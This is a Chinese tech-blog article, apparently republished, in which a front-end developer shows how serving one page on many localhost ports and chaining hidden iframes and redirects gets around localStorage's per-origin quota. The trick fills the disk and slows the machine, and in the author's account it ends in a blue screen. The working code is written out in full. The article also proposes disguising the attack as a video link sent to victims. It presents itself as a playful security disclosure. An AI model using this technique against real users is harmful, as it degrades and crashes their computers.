作为一个前端,可以如何机智地弄坏一台电脑?
有人说,前端的界限就在浏览器那儿。
无论你触发了多少bug,最多导致浏览器崩溃,对系统影响不到哪去。 这就像二次元各种炫酷的毁灭世界,都不会导致三次元的世界末日。 然而,作为一个前端,我发现是有方式打开次元大门的…
这个实验脑洞较大,动机无聊,但某种意义上反映了一些 安全问题 。 想象一下,有天你在家里上网,吃着火锅还唱着歌, 点开一个链接,电脑突然就蓝屏了 !想想还真有点小激动。
起因
故事得从localStorage说起。
html5的本地存储,相信大家都不陌生。将数据以二进制文件形式存储到本地,在当前应用得非常广泛。 windows下的chrome,localStorage存储于 C:/Users/xxx/AppData/Local/Google/Chrome/User Data/Default/Local Storage 文件夹中。但如果任由网页无限写文件,对用户硬盘的伤害可想而知,因而浏览器对其做了大小限制。
对于一个域名+端口,PC侧的上限是5M-10M之间,移动侧是则不大于2.5M。
那么问题就变成: 这样的限制足够保护用户硬盘了吗 ?
关键
关键的问题在于,这一限制,针对的是一个 域名+端口 。 也就是说,你访问 同一个域名的不同端口 ,它们的localStorage并无关联,是分开存储的。
我用node简单地开启了服务器,这时,用户访问 http://127.0.0.1:1000 到 http://127.0.0.1:1099 这100个端口,会请求到同一个页面: index.html :
- var http = require( 'http' );
- var fs = require( 'fs' );
- //100个端口
- for (var port = 1000 ; port< 1100 ; port++){
- http.createServer(function (request, response) {
- //请忽略这种循环读文件的方式,只为了简便
- fs.readFile( './index.html' , function(err, content){
- if (err) {
- } else {
- response.writeHead( 200 , { 'Content-Type' : 'text/html; charset=UTF-8' });
- response.write(content);
- response.end();
- }
- });
- }).listen(port, '127.0.0.1' );
- }
当然,这个index.html里涉及了localStorage写操作。
- var s = "" ;
- //慢慢来,别写太大了,好害怕…
- for (var i= 0 ; i< 3 * 1024 * 1024 ; i++){
- s += "0" ;
- }
- localStorage.setItem( "testData" , s);
我试着用浏览器分别访问了几个端口,结果是分开存储。一切跟剧本一样。
自动遍历
但这种程度还不够。 如果要实验变得更好(xie)玩(e)一些,问题就变成如何 让用户自动遍历这些端口 ?
iframe是个好的尝试。 只要一打开 http://127.0.0.1: 1000 ,页面的脚步就会创建一个iframe,去请求 http://127.0.0.1: 1001 ,一直循环下去。
- var Main = (function(){
- var _key = "testData" ;
- var _max = 1100 ; //最大限制
- return {
- init: function(){
- //慢慢来,别写太大了,好害怕…
- var s = "" ;
- for (var i= 0 ; i< 3 * 1024 * 1024 ; i++){
- s += "0" ;
- }
- localStorage.setItem(_key, s);
- var port = parseInt(location.port)+ 1 ;
- if (port > _max) return ;
- //新添加iframe
- var url = "http://127.0.0.1:" + port;
- var $iframe = document.createElement( "iframe" );
- $iframe.src = url;
- document.getElementsByTagName( "body" )[ 0 ].appendChild($iframe);
- }
- }
- })();
当然iframe我们还可以设置为不可见,以掩盖这种不厚道的行为…
比方说,有人发给你一个链接,你打开后发现是个视频,而你根本注意不到背后的脚本,在视频播放的几分钟里,快要把你的C盘写满。
然后我就看到请求如潮水渐涨:
但是,请求到1081端口,最新的chrome就崩溃掉了…原来iframe嵌套太多,已经到达了浏览器的极限。
防止浏览器崩溃
C盘还未撑满,同志还需努力。怎么办?
突然想到,到达iframe极限之前,我们可以重定向啊。 每访问50个端口,就使用 .href 重定向一次,去确保浏览器不崩溃。
- var Main = (function(){
- var _key = "testData" ;
- var _max = 1200 ; //最大限制
- var _jumpSpace = 50 ; //为避免iframe过多导致浏览器crash,每50个执行跳转
- return {
- init: function(){
- //慢慢来,别写太大了,好害怕…
- var s = "" ;
- for (var i= 0 ; i< 3 * 1024 * 1024 ; i++){
- s += "0" ;
- }
- localStorage.setItem(_key, s);
- var port = parseInt(location.port)+ 1 ;
- if (port > _max) return ;
- if (port % _jumpSpace == 0 ){
- //每50个,重定向一次
- window.location.href = url;
- } else {
- //新添加iframe
- var $iframe = document.createElement( "iframe" );
- $iframe.src = url;
- document.getElementsByTagName( "body" )[ 0 ].appendChild($iframe);
- }
- }
- }
- })();
事实证明,这种蛮拼的方法的确可行。
至此,只要访问 http://127.0.0.1: 1000 ,就会往Local Storage文件夹里写入近500M无用数据: 
里面的数据是这样的:
继续实验的黑科技
算了下我的C盘还有空间嘛,那就把端口数量从100增长到200个。 结果是这样的,到达了1.17G大小。
在后续的实验中,我就慢慢的把端口数量与存储的数据调大。
电脑也运行得越来越慢。这是为什么呢?
我观察到,有时候执行 localStorage.setItem() 后,在文件夹里不一定立即能看到数据文件。 怀疑这些数据会被chrome先放到内存里,以避免重复读写带来的消耗,在空闲或关闭的时机,再写进硬盘里。
但此时,浏览器已经影响到系统了。它处于一种“不会崩溃”,但“因为占用了许多内存,已经妨碍用户电脑的正常使用”的状态。 即使用户关闭了浏览器窗口,也不会很快恢复。要知道读写任务并不是随窗口关闭而终止的,否则浏览器会丢失数据。
遭遇黑科技的人们能做的只有:
-
等待;
-
用任务管理器关掉chrome进程,再等待;
-
相信并尝试“重启电脑解决90%电脑问题”的科学论断
可以说,浏览器的内心几乎是崩溃的。
最后
最后,还是得用严肃脸告诫一下:害人之心不可无。 本实验,从一开始就是怀揣着将 安全问题上交给国家的初衷 去做的(是的就是这么纯粹)。
后续,看着C盘还有2G空间,我又把端口增长到2000个,试下会发生什么。 由于请求过多,需要一定时间,我就去做别的事情了。 回来后发现房间安静祥和,一片蓝光,像是加了特技。
那么问题来了,计算机修理哪家强?
有点急…
【编辑推荐】
- 无聊的前端工程师
- 前端工程师如何打发闲余时光?
- 详解前端模块化工具-webpack
- Web前端绘制0.5像素的几种方法
- 如何在前端编码时实现人肉双向编译
【责任编辑:wangxueyan TEL:(010)68476606】
正文到此结束
热门推荐
相关文章
近期评论
-
文章和留言都翻到11页了 没有OOM
-
-
朋友,翻页到11页,及以后,会出现OOM,无法访问
-
-
搞个gitee的项目
-
-
版本号是多少,你可以下载哪个代码仓库,jdk选1.8 直接跑就行
-
-
-
Loading...
![[HBLOG]公众号](https://www.liuhaihua.cn/img/qrcode_gzh.jpg)
